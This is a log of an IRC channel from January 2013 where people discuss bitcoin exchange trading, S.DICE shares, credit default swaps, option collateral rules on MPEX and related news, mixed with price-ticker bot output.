that pic from jurov Jan 28 14:34:43 ah Jan 28 14:34:49 bitcoin tabloid #6, page 57? Jan 28 14:34:51 i guess. Jan 28 14:35:02 you want *that* drivel scanned? Jan 28 14:35:20 but it's like 3 pages :/ Jan 28 14:35:28 its ok. Jan 28 14:35:36 ill manage without :) Jan 28 14:35:40 ty Jan 28 14:35:58 [BTCTC] [GSDPT] 1 @ 0.0074 BTC [-] Jan 28 14:39:48 nuff fun. back to work. Jan 28 14:47:09 man Jan 28 14:47:19 been importing blockchain to postgres Jan 28 14:47:27 its taking over a week Jan 28 14:47:31 and still not done Jan 28 14:47:39 impossibru Jan 28 14:49:44 would be funny if i couldnt catch up to it. Jan 28 14:57:22 [BTCTC] [LTC-MINING] 1 @ 0.49 BTC [+] Jan 28 15:02:09 uh, postgres? i like it, but i'd rather use that opportunity to dive into knuth and other less known data structures Jan 28 15:02:26 or just use files on reiser4 :D Jan 28 15:04:25 hm Jan 28 15:09:16 https://github.com/billstclair/fsdb Jan 28 15:11:32 but i'm serious with the reiser4 . i heard some were using it to store deserialized xml, myself was taken aback how fast it accesses gentoo portage compared to anything else Jan 28 15:11:57 so sad reiser was such a maniac otherwise Jan 28 15:21:50 [MPEX] [S.MPOE] 1419 @ 0.00065999 = 0.9365 BTC [+] Jan 28 15:21:51 [MPEX] [S.MPOE] 1781 @ 0.00066028 = 1.176 BTC [+] Jan 28 15:25:30 gem is about to hit 100BTC http://www.bitcoingem.com Jan 28 15:28:17 never knew that existed. is there a history for price and number of purchases? Jan 28 15:28:37 [MPEX] [S.MPOE] 9050 @ 0.00065746 = 5.95 BTC [-] Jan 28 15:28:41 found it Jan 28 15:30:06 what an odd idea. never know when the next buyer is going to arrive though. Jan 28 15:31:00 they heard mircea wondering what to do of these 7kbtc he suddenly got on thursday Jan 28 15:31:18 *with these Jan 28 15:31:45 [BTCTC] [BTC-BOND] 2 @ 0.0099 = 0.0198 BTC [+] Jan 28 15:35:28 you know when its gonna arrive Jan 28 15:35:32 IMMEDIATELY Jan 28 15:35:51 its very difficult to get your bid in before someone else bids. Jan 28 15:35:58 at this point Jan 28 15:39:01 jurov: reiser4 is super when you have loads of tiny files in huge piles Jan 28 15:40:33 azx, i know. and many storage problems can be implemented in that way. Jan 28 15:40:48 fuckin ass. Jan 28 15:40:59 ;;ticker Jan 28 15:41:00 BTCUSD ticker | Best bid: 18.12000, Best ask: 18.25000, Bid-ask spread: 0.13000, Last trade: 18.25000, 24 hour volume: 31140.10147696, 24 hour low: 17.45000, 24 hour high: 18.25000, 24 hour vwap: 17.92591 Jan 28 15:49:25 [MPEX] [S.MPOE] 6500 @ 0.00066029 = 4.2919 BTC [+] Jan 28 16:18:40 kakobreklaaa: wtf postgres? Jan 28 16:20:35 !ticker m S.DICE Jan 28 16:20:37 [MPEX:S.DICE] 1D: 0.00722786 / 0.00744254 / 0.00749999 (122574 shares, 912.26 BTC), 7D: 0.00085848 / 0.00526603 / 0.0075 (1205508 shares, 6,348.25 BTC), 30D: 0.00085848 / 0.0042815 / 0.0075 (10577036 shares, 45,285.60 BTC) Jan 28 16:24:24 [MPEX] [S.MPOE] 2267 @ 0.00066029 = 1.4969 BTC [+] Jan 28 16:24:26 [MPEX] [S.MPOE] 8050 @ 0.00066127 = 5.3232 BTC [+] Jan 28 16:32:30 http://bou.si/4c/1353994707219.jpg Jan 28 16:33:01 [MPEX] [S.MPOE] 17450 @ 0.00066411 = 11.5887 BTC [+] Jan 28 16:33:02 [MPEX] [S.MPOE] 1650 @ 0.000665 = 1.0973 BTC [+] Jan 28 16:45:42 http://shrani.si/f/2m/GT/f3aqrFT/terry-richardson-cow-wom.jpg Jan 28 16:45:57 [MPEX] [S.DICE] 550 @ 0.00743189 = 4.0875 BTC [-] Jan 28 16:45:58 [MPEX] [S.DICE] 4450 @ 0.00745017 = 33.1533 BTC [+] Jan 28 16:47:01 [HAVELOCK] [SDICE] 50 @ 0.8 = 40 BTC [-] Jan 28 16:51:34 [MPEX] [S.MPOE] 27050 @ 0.0006627 = 17.926 BTC [-] Jan 28 17:04:40 [MPEX] [S.MPOE] 6158 @ 0.000665 = 4.0951 BTC [+] Jan 28 17:16:18 !ticker h sdice Jan 28 17:16:20 [HAVELOCK:SDICE] 1D: 0.79900000 / 0.8 / 0.81000000 (69 shares, 55.20000000 BTC), 7D: 0.44000000 / 0.60774289 / 0.81000000 (1369 shares, 832.00001806 BTC), 30D: 0.37000000 / 0.49998681 / 0.81000000 (5268 shares, 2633.93051794 BTC) Jan 28 17:21:37 this seems odd http://bitbet.us/bet/99/mpex-s-dice-price-ranges-0-00445-0-00495/ Jan 28 17:32:06 yea why is it not closed Jan 28 17:48:08 [MPEX] [S.DICE] 2000 @ 0.00745016 = 14.9003 BTC [-] Jan 28 17:48:10 [MPEX] [S.DICE] 500 @ 0.00745017 = 3.7251 BTC [+] Jan 28 17:59:11 [MPEX] [S.MPOE] 2393 @ 0.00066355 = 1.5879 BTC [-] Jan 28 18:01:00 why would it be closed? Jan 28 18:01:15 !ticker m s.dice Jan 28 18:01:16 [MPEX:S.DICE] 1D: 0.00722786 / 0.00744277 / 0.00749999 (127674 shares, 950.25 BTC), 7D: 0.00085848 / 0.00527973 / 0.0075 (1204612 shares, 6,360.04 BTC), 30D: 0.00085848 / 0.00428374 / 0.0075 (10584536 shares, 45,341.47 BTC) Jan 28 18:01:39 hmm Jan 28 18:02:01 yeah Jan 28 18:02:02 silly. Jan 28 18:06:59 [MPEX] [S.MPOE] 57 @ 0.00066355 = 0.0378 BTC [-] Jan 28 18:07:00 [MPEX] [S.MPOE] 4775 @ 0.0006627 = 3.1644 BTC [-] Jan 28 18:10:37 when is dividends day for s.dice? Jan 28 18:15:03 ;;ticker Jan 28 18:15:04 BTCUSD ticker | Best bid: 18.22130, Best ask: 18.22401, Bid-ask spread: 0.00271, Last trade: 18.22130, 24 hour volume: 32164.29648754, 24 hour low: 17.60000, 24 hour high: 18.25000, 24 hour vwap: 17.99353 Jan 28 18:22:49 [MPEX] [S.BBET] 280 @ 0.0015 = 0.42 BTC [+] Jan 28 18:34:28 http://www.bloomberg.com/news/2013-01-28/bitcoin-s-gains-may-fuel-central-bank-concerns-chart-of-the-day.html Jan 28 18:36:43 [MPEX] [S.MPOE] 10250 @ 0.00066025 = 6.7676 BTC [-] Jan 28 18:36:45 [MPEX] [S.MPOE] 24566 @ 0.00065746 = 16.1512 BTC [-] Jan 28 18:37:28 [MPEX] [S.MPOE] 31568 @ 0.00065746 = 20.7547 BTC [-] Jan 28 18:37:30 [MPEX] [S.MPOE] 2232 @ 0.00065236 = 1.4561 BTC [-] Jan 28 18:54:14 [MPEX] [S.MPOE] 9850 @ 0.00065236 = 6.4257 BTC [-] Jan 28 18:55:36 kakobrekla: that article is a bit disconcerning Jan 28 18:56:04 I'd like to think Bitcoin is gaining traction, but not nearly enough to undermine a bank Jan 28 18:56:10 [MPEX] [S.MPOE] 2268 @ 0.00066028 = 1.4975 BTC [+] Jan 28 18:56:12 [MPEX] [S.MPOE] 9700 @ 0.00066159 = 6.4174 BTC [+] Jan 28 18:56:13 [MPEX] [S.MPOE] 1232 @ 0.00066499 = 0.8193 BTC [+] Jan 28 19:15:23 nice article kakobrekla Jan 28 19:17:19 http://www.forbes.com/sites/jonmatonis/2013/01/28/government-ban-on-bitcoin-would-fail-miserably/ Jan 28 19:17:39 other opinion. quite saner. Jan 28 19:24:36 thank you Jan 28 19:24:38 good 'ol matonis Jan 28 19:24:49 poking a stick at the gubment Jan 28 19:25:24 ;;ticker Jan 28 19:25:25 BTCUSD ticker | Best bid: 18.23500, Best ask: 18.29800, Bid-ask spread: 0.06300, Last trade: 18.23500, 24 hour volume: 32801.03890254, 24 hour low: 17.60000, 24 hour high: 18.29800, 24 hour vwap: 18.01947 Jan 28 19:25:38 dudes Jan 28 19:25:48 are we going to seriously challenge $20 again Jan 28 19:26:11 yeah Jan 28 19:26:12 so sad Jan 28 19:27:20 ;;asks 20 Jan 28 19:27:20 make me want to cry Jan 28 19:27:22 There are currently 37282.992 bitcoins offered at or under 20.0 USD, worth 710857.914524 USD in total. Jan 28 19:27:41 ;;bids 17 Jan 28 19:27:43 There are currently 17502.231 bitcoins demanded at or over 17.0 USD, worth 305581.921765 USD in total. Jan 28 19:27:52 ;;bids 18 Jan 28 19:27:54 There are currently 1048.9977 bitcoins demanded at or over 18.0 USD, worth 18980.1324954 USD in total. Jan 28 19:28:07 I am feeling better about drunken purchse of 4,000 calls on Sat night at the ask. Jan 28 19:28:37 what C180? Jan 28 19:28:44 C170-200 Jan 28 19:29:38 is 17 worth more now? Jan 28 19:30:11 the asks are all up 4-7% Jan 28 19:30:22 and the bot hasn't yet caught up to the rise in price. Jan 28 19:30:41 no buyers out there though Jan 28 19:30:43 for now Jan 28 19:31:10 what do you do if the price begins to fall? Jan 28 19:31:35 !ticker m O.BTCUSD.C170T Jan 28 19:31:57 come one assbot Jan 28 19:31:59 I dunno Jan 28 19:32:06 we are still 25 days out Jan 28 19:32:11 not gonna panic sell Jan 28 19:32:31 just keep them up just under mope bot Jan 28 19:32:42 someone will probably buy them eventually Jan 28 19:34:30 !ticker m s.dice Jan 28 19:34:54 Over 100k bet on S.DICE since the last doog post Jan 28 19:35:19 1 million in bets might be in play this month Jan 28 19:37:33 again this. Jan 28 19:41:59 hello everyone Jan 28 19:42:20 does anyone know whether there is a full credit market somewhere in bitcoin ? Jan 28 19:42:35 [MPEX] [S.MPOE] 24700 @ 0.00065395 = 16.1526 BTC [-] Jan 28 19:43:01 sorru guise, im sick. Jan 28 19:44:17 awkorama, hello, what do you mean? Jan 28 19:44:34 some exchange, where I can trade credit derivatives Jan 28 19:44:46 mainly credit default swaps that is Jan 28 19:45:29 !ticker m s.dice Jan 28 19:45:31 [MPEX:S.DICE] 1D: 0.00722786 / 0.0074427 / 0.00749999 (125491 shares, 933.99 BTC), 7D: 0.00085848 / 0.00528 / 0.0075 (1201012 shares, 6,341.35 BTC), 30D: 0.00085848 / 0.00428374 / 0.0075 (10584536 shares, 45,341.47 BTC) Jan 28 19:45:52 dunno.. and bitcoin defaulted loans are usually worthless Jan 28 19:46:11 well they wouldn't be if there was protection to buy Jan 28 19:47:09 sounds like a business opportunity for you awkorama Jan 28 19:47:41 i mean, it's impossible to price such a thing reasonably.. but if you can yes it's opportunity Jan 28 19:48:08 demand and supply is enough for pricing I suppose Jan 28 19:49:01 and I don't know what the difference would be, trading CDS's on public corporation (e.g. IBM) or on S.DICE.. same thing really Jan 28 19:49:34 i loathe things I don't understand. Credit Default Swaps are one of those things (there are many). Jan 28 19:49:53 DeadWeasel: do you understand shorting ? Jan 28 19:50:21 http://en.wikipedia.org/wiki/Credit_default_swap Jan 28 19:50:49 ;;ticker Jan 28 19:50:50 BTCUSD ticker | Best bid: 18.42990, Best ask: 18.44997, Bid-ask spread: 0.02007, Last trade: 18.45000, 24 hour volume: 37939.91168858, 24 hour low: 17.60000, 24 hour high: 18.45000, 24 hour vwap: 18.06613 Jan 28 19:51:24 counterparty risk in bitcoin world is astronomical Jan 28 19:51:37 people have made reinsurance and default insurance funds Jan 28 19:51:40 they were all scams Jan 28 19:51:59 or so ineptly run so as to approximate scams (usagi for example) Jan 28 19:52:14 ^^^^ Jan 28 19:52:46 i understand that otc cds market would not work, that's why exchange + clearing house that is (more trusted) is required Jan 28 19:53:03 that would escro the collateral Jan 28 19:53:12 escrow** Jan 28 19:53:57 so it's loan insurance? Jan 28 19:54:03 it's turtles all the way down... Jan 28 19:54:05 yes Jan 28 19:54:25 thx for link. figured it would be more complicated. Jan 28 19:54:25 sorry, what does that idiom mean? Jan 28 19:55:41 after checking the wiki, it is not an apt metaphor. Jan 28 19:55:43 http://en.wikipedia.org/wiki/Turtles_all_the_way_down Jan 28 19:56:14 awkorama, actually do you see any two parties atm where cds would work? Jan 28 19:56:29 yes Jan 28 19:56:35 for example? Jan 28 19:56:43 i mean in bitcoinland Jan 28 19:56:50 somebody wanting to short s.dice Jan 28 19:57:37 vs. someone trying to invest in it indirectly Jan 28 19:57:39 smickles already offers s.dice for shorting Jan 28 19:58:22 now if he wanted to use cds to insure the loan, how would he go about it? Jan 28 19:59:29 he would buy CDS Jan 28 20:00:13 in the event of default (determined by the exchange on objective conditions) he would receive the principal Jan 28 20:00:27 yes. but how would you price the cds (if you were selling them)? that would be insane Jan 28 20:01:04 as a seller of protection ? Jan 28 20:02:15 mainly using the interest rate + research on the reference entity Jan 28 20:02:54 in a situation like... on btcjam is only some 78% loans paid. and they ask personal info to eventually recover these loans later Jan 28 20:03:09 we don't have much personal info between us Jan 28 20:03:26 well then that protection would be bloody expensive Jan 28 20:03:40 because the loan itself is risky Jan 28 20:05:23 mircea already did experiment with CDOs, and it didn't go well exactly cause of this Jan 28 20:06:05 78% is a bad overall rate, I give you that Jan 28 20:06:16 [MPEX] [S.MPOE] 17429 @ 0.00065149 = 11.3548 BTC [-] Jan 28 20:08:44 but in theory CDS's should help here, cause they generally increase liquidity of debt Jan 28 20:10:01 one can't just transplant real life financials here, just reinvent them. I think MPOE was so successful cause it is basically short-term. It loans every month anew. Jan 28 20:10:03 meaning, if I lend someone 100BTC today and tommorow I don't feel like having such big exposure to him anymore, I can just insure some part of that debt Jan 28 20:10:57 the mpoe contract is clear and for the issuer has incentive to stick to it Jan 28 20:11:53 how do these options btw work on MPEx, is the seller required to pay collateral (since he has potential unlimited loss) ? Jan 28 20:12:17 yes Jan 28 20:12:26 1btc for calls Jan 28 20:12:30 a bit more for puts Jan 28 20:12:35 max loss is 1btc on calls Jan 28 20:12:43 max loss is Inf btc on put Jan 28 20:12:52 but at btc = Jan 28 20:13:01 yeah, sure Jan 28 20:13:15 btc = $0, who cares about being down Inf bitcoins Jan 28 20:13:44 http://mpex.co/faq.html Jan 28 20:14:27 that is not exactly explained in the faq Jan 28 20:14:37 the collateral reqs on the SPLIT order are a bit harsh. I think you should get 100 of each side for 100BTC, cause if one side goes to max, the other side is a zero. Jan 28 20:15:00 [MPEX] [S.MPOE] 2500 @ 0.00065395 = 1.6349 BTC [+] Jan 28 20:15:02 [MPEX] [S.MPOE] 7700 @ 0.00066499 = 5.1204 BTC [+] Jan 28 20:15:07 "Each CALL requires 1 BTC of collateral irrespective of strike. Each PUT requires an amount of collateral equal to strike / spot BTC ." Jan 28 20:15:22 ^^ from the FAQ Jan 28 20:15:36 i mean the reasoning behind that isn't there Jan 28 20:16:14 lim of (x-s)/x as x -> Inf is pretty clear Jan 28 20:17:03 why u don't need Inf colateral for the puts is not explained Jan 28 20:17:22 nor is the puts equation correct in the faq it seems Jan 28 20:17:36 I always get less puts then I think I'm gonna get Jan 28 20:18:00 i think cause btc can go 50% up and then 50% down in one month Jan 28 20:20:06 hehe it can do that in a WEEK Jan 28 20:31:50 ahh what's new ? Jan 28 20:36:33 lol jurov Jan 28 20:36:35 that an ad ? Jan 28 20:36:44 y Jan 28 20:38:00 oh and there's a mention of Mircea Popescu Jan 28 20:38:46 they cite your article "The Reason Why Bitcoin Securities Can't be regulated by the SEC" Jan 28 20:38:48 ;;ticker Jan 28 20:38:49 BTCUSD ticker | Best bid: 18.30000, Best ask: 18.42591, Bid-ask spread: 0.12591, Last trade: 18.30000, 24 hour volume: 39943.63867461, 24 hour low: 17.61001, 24 hour high: 18.45000, 24 hour vwap: 18.09211 Jan 28 20:39:22 some exchange, where I can trade credit derivatives << explain. Jan 28 20:40:09 jurov srsly ?! which one ? Jan 28 20:40:30 mircea_popescu: I already kind of did, is there anything that you don't understand from the conversation that followed my initial question ? Jan 28 20:40:58 i don't see that any of that pertains to credit derivatives tho. Jan 28 20:42:00 [MPEX] [S.MPOE] 17300 @ 0.00065149 = 11.2708 BTC [-] Jan 28 20:42:01 it's in Bitcoin and the Law article, btcmag #6, not signed Jan 28 20:42:19 o, on paper ? Jan 28 20:42:24 yea Jan 28 20:42:25 make me a pic would you ? can you even ? Jan 28 20:42:26 by credit derivatives I mainly meant various CDS contracts, I am not really interested in CDO's or CDO^2's Jan 28 20:42:33 yes, mmnt Jan 28 20:42:35 awkorama cds on what, specificqally ? Jan 28 20:42:41 there's mpoe bonds in btc and that's about it. Jan 28 20:43:01 well you can have CDS on equity as well Jan 28 20:43:13 and also on general loans Jan 28 20:43:19 [MPEX] [S.MPOE] 11068 @ 0.00066499 = 7.3601 BTC [+] Jan 28 20:43:21 [MPEX] [S.MPOE] 14192 @ 0.000665 = 9.4377 BTC [+] Jan 28 20:43:22 [MPEX] [S.MPOE] 2250 @ 0.00066582 = 1.4981 BTC [+] Jan 28 20:43:24 [MPEX] [S.MPOE] 9683 @ 0.00066591 = 6.448 BTC [+] Jan 28 20:43:51 i guess you could... Jan 28 20:44:02 there was an attempt, the mpcd series Jan 28 20:44:12 it failed miserably. Jan 28 20:44:50 because what I feel strongly in the bitcoin world is that it is hard to trust anyone, so spreading the risk is the next logical step Jan 28 20:48:46 do you want to read the mpcd history ? Jan 28 20:48:54 hmm, can someone explain this to me.. 29k share sissued.. yet tyere are over 29k shares on the ask list... https://btct.co/security/BTC-BOND Jan 28 20:48:59 I enjoyed the mpcd experience Jan 28 20:49:20 er 29k outstanding Jan 28 20:49:21 Ukto they allow naked shorts ? Jan 28 20:49:28 dont think so Jan 28 20:49:30 it was fun exiting each tranche before it exploded Jan 28 20:49:38 heh. Jan 28 20:49:43 i cant post asks for more shares than I have Jan 28 20:51:48 0.0 Jan 28 20:52:13 hence my "wtf" Jan 28 20:52:17 So I am curious. What is the rationale for having the collateral requirements so high for split orders. Since one side is a zero if the other side goes up, shouldn't a reasonable deposit for 50 calls and ~50 puts be 50BTC instead of 100BTC? Jan 28 20:52:40 Ukto that sounds like the very definition of "they allow naked shorting" Jan 28 20:53:43 Bugpowder_ sort of a dampening factor. Jan 28 20:54:13 its an exercise issue? Jan 28 20:54:14 oh yes Jan 28 20:54:17 i ment to say yes earlier Jan 28 20:54:22 not dont think so Jan 28 20:54:29 not sure wtf i was typing Jan 28 20:54:34 to prevent catastropic loss from a spike than crash? Jan 28 20:54:39 ala august? Jan 28 20:56:52 Bugpowder_ something like that. you're thinking "momentarily one is zero" this is true, but whiplash could make someone lose on both ends Jan 28 21:00:35 mircea_popescu, http://live.coinbr.com/images/bitcoin_law.pdf , page 3 Jan 28 21:00:47 Bugpowder_ https://bitcointalk.org/index.php?topic=139529.msg1485624#msg1485624 i take it you're buying ? :p Jan 28 21:00:53 jurov danke Jan 28 21:01:11 I guess I just wish it wouldn't charge me for the deposit until the created contracts sold. Jan 28 21:01:33 not exactly nice to read, they seem to used anti-OCR background :P Jan 28 21:02:45 jurov i was gonna say WHAT THE FUCK ios that Jan 28 21:02:48 well I tried to withdraw 100BTC from MPEX on Saturday to buy the gem, but never got my withdrawl Jan 28 21:02:54 Jan 28 21:02:55 is thsi thing printed on cheap cloth Jan 28 21:03:07 Bugpowder_ you sure you actually had the cash ? Jan 28 21:03:09 maybe I placed some buy orders after that Jan 28 21:03:17 and that blocked it Jan 28 21:03:32 it looks much better... but the halftoning clashes with my scanner Jan 28 21:03:41 a a Jan 28 21:03:48 so basically... you're pirateing here Jan 28 21:04:27 Reproduction without writtenm permission is strictly prohibited. Jan 28 21:04:44 you dun goofed Jan 28 21:06:32 seriously, what did the website owner THINK was gonna happen with the gem Jan 28 21:07:05 Bugpowder_ its one of two things : either a scam to sell a worthless site to some dumbass "investor" (which is what i suspect, he;'s been buying his own gem) Jan 28 21:07:19 everything about the bitcoin world suggests that the price would rapidly go to 1000BTC+ Jan 28 21:07:22 or else what the forum says, ie, he's passing the buck and then new owner dissapears, a la tom's azns Jan 28 21:07:27 nah. Jan 28 21:12:59 Starting to look a lot like last thursday Jan 28 21:13:20 [BTCTC] [BASIC-MINING] 15 @ 0.3351 = 5.0265 BTC [-] Jan 28 21:13:22 [BTCTC] [BASIC-MINING] 10 @ 0.333 = 3.33 BTC [-] Jan 28 21:13:35 bidwall flashing at 18.20 Jan 28 21:14:35 ;;ticker Jan 28 21:14:35 BTCUSD ticker | Best bid: 18.32401, Best ask: 18.39988, Bid-ask spread: 0.07587, Last trade: 18.32401, 24 hour volume: 40611.11390206, 24 hour low: 17.67720, 24 hour high: 18.45000, 24 hour vwap: 18.10523 Jan 28 21:14:43 cool. Jan 28 21:15:01 17 looks like real price... Jan 28 21:15:36 I dunno dude Jan 28 21:15:45 17 looks like a technical floor Jan 28 21:16:35 [MPEX] [S.MPOE] 20500 @ 0.00065149 = 13.3555 BTC [-] Jan 28 21:17:16 i dun imagine it does under 18 myself Jan 28 21:18:18 <+amphipod> Jan28 19:17:19 mtgox x194 4,003.9372 @ 18.49732098 USD Jan 28 21:18:22 beefy Jan 28 21:19:49 Jackmani_ jarpiain jborkl jcpham jurov JWU42 JWU_42 Jan 28 21:20:04 JWU_42 i dunno how to read that, is it 4k btc in 194 diff orders ? Jan 28 21:20:10 we just poked thru the 18.50 wall? Jan 28 21:20:13 nice Jan 28 21:20:18 yep Jan 28 21:20:34 well - 194 different asks IIRC Jan 28 21:20:41 i remember the days buying 4k btc didn't run you 10k Jan 28 21:20:52 ;;ask 20 Jan 28 21:20:53 Error: "ask" is not a valid command. Jan 28 21:20:55 ;;asks 20 Jan 28 21:20:57 There are currently 28609.726 bitcoins offered at or under 20.0 USD, worth 551692.514158 USD in total. Jan 28 21:21:04 that is down from over 40,000 a few hours ago Jan 28 21:21:06 hmm Jan 28 21:21:15 ;;asks 19 Jan 28 21:21:16 mtgox weekend delay coming thru Jan 28 21:21:16 There are currently 11455.979 bitcoins offered at or under 19.0 USD, worth 215539.007546 USD in total. Jan 28 21:21:20 jurov i wonder if i get a complimentary mag since i'm being quited in it :D Jan 28 21:21:33 see the drop on thurs Jan 28 21:21:35 wire money Jan 28 21:21:41 buy coins on monday Jan 28 21:21:48 Bugpowder_ ya sounds likely. Jan 28 21:22:04 this is why I bot calls on Saturday Jan 28 21:22:23 That, and this http://beeradvocate.com/beer/profile/4/16909 Jan 28 21:22:32 “I think the ECB obviously is concerned, and it’s not reputational,” said Steve Hanke, a professor at Johns Hopkins University in Baltimore Jan 28 21:22:37 dude seriously ?! Jan 28 21:22:50 what the fuck does that mean and when did they start doing the whole university thing in baltimore. Jan 28 21:23:45 johns hopkins? Jan 28 21:24:05 1876 Jan 28 21:24:16 Bugpowder_ im just hatin' Jan 28 21:25:39 the curse of bitcoin : it can't get any coverage unless it's either a) completely clueless or else b) incredibly fanboish Jan 28 21:25:47 it seems there can't be someone who gets it and doesn't care. Jan 28 21:26:52 also matonis fucked up his link to the moldbug guy Jan 28 21:40:25 [MPEX] [S.MPOE] 11600 @ 0.00065424 = 7.5892 BTC [+] Jan 28 21:40:28 Whoa. 3 new dice winners Jan 28 21:40:34 big ? Jan 28 21:40:41 I mean on the leaderboards Jan 28 21:42:39 [BTCTC] [GSDPT] 1500 @ 0.0074 = 11.1 BTC [-] Jan 28 21:43:21 would the SPLIT on O.BTCUSD.P160T for 2BTC make 1 put option or none? Jan 28 21:44:03 prolly none Jan 28 21:44:20 um Jan 28 21:44:23 actually prolly 1 Jan 28 21:46:09 what's the formula? Jan 28 21:46:30 bugpowder has just complained bout it, too Jan 28 21:48:18 strike/current would be 16/18 , that means collateral below 1BTC? Jan 28 21:48:45 it takes a leetal more. not very much Jan 28 21:54:11 enough to push S.DICE thru 0.0075? Jan 28 21:54:11 https://bitcointalk.org/index.php?topic=80312.msg1485906#msg1485906 Jan 28 21:58:44 ;;ticker Jan 28 21:58:45 BTCUSD ticker | Best bid: 18.50501, Best ask: 18.60708, Bid-ask spread: 0.10207, Last trade: 18.50501, 24 hour volume: 47219.24403078, 24 hour low: 17.67720, 24 hour high: 18.63895, 24 hour vwap: 18.16932 Jan 28 21:59:48 SD Profit after fees: 51037.02759636 BTC (1.939%) Jan 28 21:59:50 whoa ? Jan 28 22:00:14 yah Jan 28 22:00:22 over 100k bet in the last 24. Jan 28 22:01:46 840,000 BTC bet this month Jan 28 22:02:10 wait. what?! Jan 28 22:02:13 huge. Jan 28 22:02:19 yup Jan 28 22:02:26 its been over a decade since i dod stock market stuffs.. if i have $10k in an eTrade account or w/e, and and put up a bid for a total of $10k on something that sits on the books, I can't just place another bid p to $10k for another asset, right? Jan 28 22:03:23 right Jan 28 22:03:32 they copied the way bitfunder does it Jan 28 22:05:47 LOL Jan 28 22:05:56 you mean, Bitfunder does it the "normal" way Jan 28 22:06:15 Ukto it's been debated in the forum numerous times. people who know better figure "it helps liquidity" Jan 28 22:06:25 but its a lie. Jan 28 22:06:34 if you want i can have the girl dig up the old posts. Jan 28 22:06:39 dun worri, glbse 3 will have it Jan 28 22:06:40 on btct, I can fill my account with 100btc, put up to 100btc orders on each asset, and withdraw the 100btc Jan 28 22:06:45 and then its a complete, lie Jan 28 22:07:24 dub speaking of which, what's happening to nefario's comeback thing ? Jan 28 22:07:34 did he get the financing eventually ? Jan 28 22:07:48 not heard anything about it Jan 28 22:07:59 Regardless of 'pumping the numbers', i think traders have a right to knwo that a bid is actually backed, and not just a fake number on the books. Jan 28 22:09:03 traders are free to figure it out neh ? Jan 28 22:09:33 I just cant bring myself to knowingly allow lies and inaccuracy on my system. Jan 28 22:09:45 I will be letting Deprived know that it just wont be happening. Jan 28 22:09:46 so then don't. Jan 28 22:10:05 ;;tslb Jan 28 22:10:08 Time since last block: 33 minutes and 12 seconds Jan 28 22:10:57 on btct, I can fill my account with 100btc, put up to 100btc orders on each asset, and withdraw the 100btc << this is pretty rich tho Jan 28 22:11:03 [MPEX] [S.MPOE] 1600 @ 0.00065424 = 1.0468 BTC [+] Jan 28 22:11:24 thats awesome Jan 28 22:11:31 it's like... Jan 28 22:11:37 i wonder what bernanke's waiting for Jan 28 22:11:44 should be in the fucking exchange rules for usd. Jan 28 22:13:20 someone should rinse/repeat that and make a trillion btc wall Jan 28 22:13:37 just for the lulz Jan 28 22:13:40 ? Jan 28 22:13:54 also for win Jan 28 22:14:16 someone should make the whole thing Jan 28 22:14:18 1. fake asset Jan 28 22:14:22 2. fake bid and ask walls Jan 28 22:14:25 3. ??? Jan 28 22:14:28 4. !!! Jan 28 22:14:30 5. etc Jan 28 22:14:38 99. profit Jan 28 22:14:51 34. pr0n first Jan 28 22:15:14 dub: you coudl do it with muliple accounts Jan 28 22:15:24 tho that would be obvious and burnside would prolly ban you for it. at least.. those accounts Jan 28 22:15:25 lol Jan 28 22:15:28 or just match orders on one popular asset and closely watch the orderbook of others Jan 28 22:15:44 https://bitcointalk.org/index.php?topic=135491.msg1485958#msg1485958 lol @daniel having a shitfit Jan 28 22:17:02 LOL Jan 28 22:17:38 that dude is retarded Jan 28 22:18:20 gettin high on his own supply Jan 28 22:18:54 he has a point, we really ought to discourage that sort of shit Jan 28 22:19:12 the guy clearly is professionally breaking the law. Jan 28 22:19:15 not in a good way either. Jan 28 22:20:39 [MPEX] [S.MPOE] 18880 @ 0.00065424 = 12.3521 BTC [+] Jan 28 22:24:00 If you had gold, what would you do with it? Jan 28 22:24:23 sell it. Jan 28 22:24:35 make a golden fist Jan 28 22:24:42 and buy bitcoinz. Jan 28 22:27:31 [MPEX] [S.MPOE] 770 @ 0.00065424 = 0.5038 BTC [+] Jan 28 22:27:32 [MPEX] [S.MPOE] 9351 @ 0.00065534 = 6.1281 BTC [+] Jan 28 22:27:34 [MPEX] [S.MPOE] 2779 @ 0.00066591 = 1.8506 BTC [+] Jan 28 22:33:36 [MPEX] [O.BTCUSD.C180T] 5 @ 0.22362465 = 1.1181 BTC [+] Jan 28 22:33:48 ;;ticker Jan 28 22:33:49 BTCUSD ticker | Best bid: 18.70001, Best ask: 18.74988, Bid-ask spread: 0.04987, Last trade: 18.70001, 24 hour volume: 51140.36456515, 24 hour low: 17.67720, 24 hour high: 18.75000, 24 hour vwap: 18.22004 Jan 28 22:34:41 [MPEX] [O.BTCUSD.C190T] 10 @ 0.19810428 = 1.981 BTC [+] Jan 28 22:35:28 that's the plan Jan 28 22:35:34 wish I'd done it at 1900 Jan 28 22:35:48 but it's in another state in a deposit box dammit Jan 28 22:35:59 yah well. Jan 28 22:36:08 exactly why i'd sell it lol. problem typified Jan 28 22:36:12 "Chart Of The Day: Is The ECB Responsible For The Second Coming Of BitCoin? | Zero Hedge: Jan 28 22:36:15 good point Jan 28 22:36:18 bah, can they get sillier ? Jan 28 22:36:31 Anybody find it odd that Avalon has sort of..disappeared? Website and all.. Jan 28 22:36:41 they ran aground, basically Jan 28 22:36:42 here's bitcoin. let us try and pin some irrelevant fiat idiocy to it because it's not possible for fiat to be irrelevant Jan 28 22:36:50 Korbman nope. Jan 28 22:37:44 mircea_popescu: haha yeah, I figured as much Jan 28 22:38:27 inb4 chinese new year relic collector Jan 28 22:39:05 http://bitbet.us/bet/34/an-asic-unit-from-either-bfl-avalon-or/ Jan 28 22:39:23 heh Jan 28 22:39:24 this bet. still not resolved. specifically for that reason. Jan 28 22:39:31 well hows this Jan 28 22:39:33 when I get the board Jan 28 22:39:35 Ill take photos of it Jan 28 22:39:55 sure. Jan 28 22:40:11 and then I wont share the photos because Ill be too busy being rich Jan 28 22:40:37 take pic in front of your DC with windmills in the background Jan 28 22:41:34 dub: I plan on doing that anyhow Jan 28 22:42:17 http://buttcoin.org/bitcoin-community-spotlight-johnniewalker Jan 28 22:42:22 hey, this is back from the dead Jan 28 22:43:17 also http://buttcoin.org/the-buttgem Jan 28 22:45:33 heheh Jan 28 22:45:47 < Bugpowder> I always get less puts then I think I'm gonna get< that's b/c there is a volatility secret sauce in the calc Jan 28 22:46:50 haha Jan 28 22:50:52 !ticker m s.dice Jan 28 22:50:53 [MPEX:S.DICE] 1D: 0.00722786 / 0.0074427 / 0.00749999 (125491 shares, 933.99 BTC), 7D: 0.00085848 / 